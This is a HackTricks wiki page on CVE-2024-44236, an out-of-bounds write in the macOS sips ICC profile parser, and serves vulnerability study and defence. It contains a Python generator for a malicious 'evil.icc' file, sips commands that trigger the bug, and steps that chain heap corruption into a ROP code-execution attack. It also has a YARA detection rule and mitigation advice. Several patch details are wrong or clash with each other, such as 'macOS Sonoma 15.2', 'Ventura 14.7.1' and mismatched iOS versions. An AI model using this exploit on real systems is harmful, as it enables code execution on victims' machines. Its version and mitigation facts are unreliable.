maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md

104 lines
5.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# WWW2Exec - sips ICC Profile Out-of-Bounds Write (CVE-2024-44236)
{{#include ../../banners/hacktricks-training.md}}
## Overview
An out-of-bounds **zero-write** vulnerability in Apple macOS **Scriptable Image Processing System** (`sips`) ICC profile parser (macOS 15.0.1, `sips-307`) allows an attacker to corrupt heap metadata and pivot the primitive into full code-execution. The bug is located in the handling of the `offsetToCLUT` field of the `lutAToBType` (`mAB `) and `lutBToAType` (`mBA `) tags. If attackers set `offsetToCLUT == tagDataSize`, the parser erases **16 bytes past the end of the heap buffer**. Heap spraying lets the attacker zero-out allocator structures or C++ pointers that will later be dereferenced, yielding an **arbitrary-write-to-exec** chain (CVE-2024-44236, CVSS 7.8).
> Apple patched the bug in macOS Sonoma 15.2 / Ventura 14.7.1 (October 30, 2024). A second variant (CVE-2025-24185) was fixed in macOS 15.5 and iOS/iPadOS 18.5 on April 1, 2025.
## Vulnerable Code
```c
// Pseudocode extracted from sub_1000194D0 in sips-307 (macOS 15.0.1)
if (offsetToCLUT <= tagDataSize) {
// BAD ➜ zero 16 bytes starting *at* offsetToCLUT
for (uint32_t i = offsetToCLUT; i < offsetToCLUT + 16; i++)
buffer[i] = 0; // no bounds check vs allocated size!
}
```
## Exploitation Steps
1. **Craft a malicious `.icc` profile**
* Set up a minimal ICC header (`acsp`) and add one `mAB ` (or `mBA `) tag.
* Configure the tag table so the **`offsetToCLUT` equals the tag size** (`tagDataSize`).
* Place attacker-controlled data right after the tag so that the 16 zero writes overlap allocator metadata.
2. **Trigger parsing with any sips operation that touches the profile**
```bash
# verification path (no output file needed)
sips --verifyColor evil.icc
# or implicitly when converting images that embed the profile
sips -s format png payload.jpg --out out.png
```
3. **Heap metadata corruption ➜ arbitrary write ➜ ROP**
On Apples default **`nano_zone` allocator**, metadata for 16-byte slots lives **immediately after** the aligned 0x1000 slab. By placing the profiles tag at the end of such a slab, the 16 zero-writes clobber `meta->slot_B`. After a subsequent `free`, the poisoned pointer is enqueued in the tiny free list, letting the attacker **allocate a fake object at an arbitrary address** and overwrite a C++ vtable pointer used by sips, finally pivoting execution to a ROP chain stored in the malicious ICC buffer.
### Quick PoC generator (Python 3)
```python
#!/usr/bin/env python3
import struct, sys
HDR = b'acsp'.ljust(128, b'\0') # ICC header (magic + padding)
TAGS = [(b'mAB ', 132, 52)] # one tag directly after header
profile = HDR
profile += struct.pack('>I', len(TAGS)) # tag count
profile += b''.join(struct.pack('>4sII', *t) for t in TAGS)
mab = bytearray(52) # tag payload (52 bytes)
struct.pack_into('>I', mab, 44, 52) # offsetToCLUT = size (OOB start)
profile += mab
open('evil.icc', 'wb').write(profile)
print('[+] Wrote evil.icc (%d bytes)' % len(profile))
```
### YARA detection rule
```yara
rule ICC_mAB_offsetToCLUT_anomaly
{
meta:
description = "Detect CLUT offset equal to tag length in mAB/mBA (CVE-2024-44236)"
author = "HackTricks"
strings:
$magic = { 61 63 73 70 } // 'acsp'
$mab = { 6D 41 42 20 } // 'mAB '
$mba = { 6D 42 41 20 } // 'mBA '
condition:
$magic at 0 and
for any i in (0 .. 10): // up to 10 tags
(
($mab at 132 + 12*i or $mba at 132 + 12*i) and
uint32(132 + 12*i + 4) == uint32(132 + 12*i + 8) // offset == size
)
}
```
## Impact
Opening or processing a crafted ICC profile leads to remote **arbitrary code execution** in the context of the invoking user (Preview, QuickLook, Safari image rendering, Mail attachments, etc.), bypassing Gatekeeper because the profile can be embedded inside otherwise benign images (PNG/JPEG/TIFF).
## Detection & Mitigation
* **Patch!** Ensure the host is running macOS ≥ 15.2 / 14.7.1 (or iOS/iPadOS ≥ 18.1).
* Deploy the YARA rule above on email gateways and EDR solutions.
* Strip or sanitise embedded ICC profiles with `exiftool -icc_profile= -overwrite_original <file>` before further processing on untrusted files.
* Harden Preview/QuickLook by running them inside sandboxed “transparency & modernisation” VMs when analysing unknown content.
* For DFIR, look for recent execution of `sips --verifyColor` or `ColorSync` library loads by sandboxed apps in the unified log.
## References
* Trend Micro Zero Day Initiative advisory ZDI-24-1445 “Apple macOS ICC Profile Parsing Out-of-Bounds Write Remote Code Execution (CVE-2024-44236)”
https://www.zerodayinitiative.com/advisories/ZDI-24-1445/
* Apple security updates HT213981 “About the security content of macOS Sonoma 15.2”
https://support.apple.com/en-us/HT213981
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink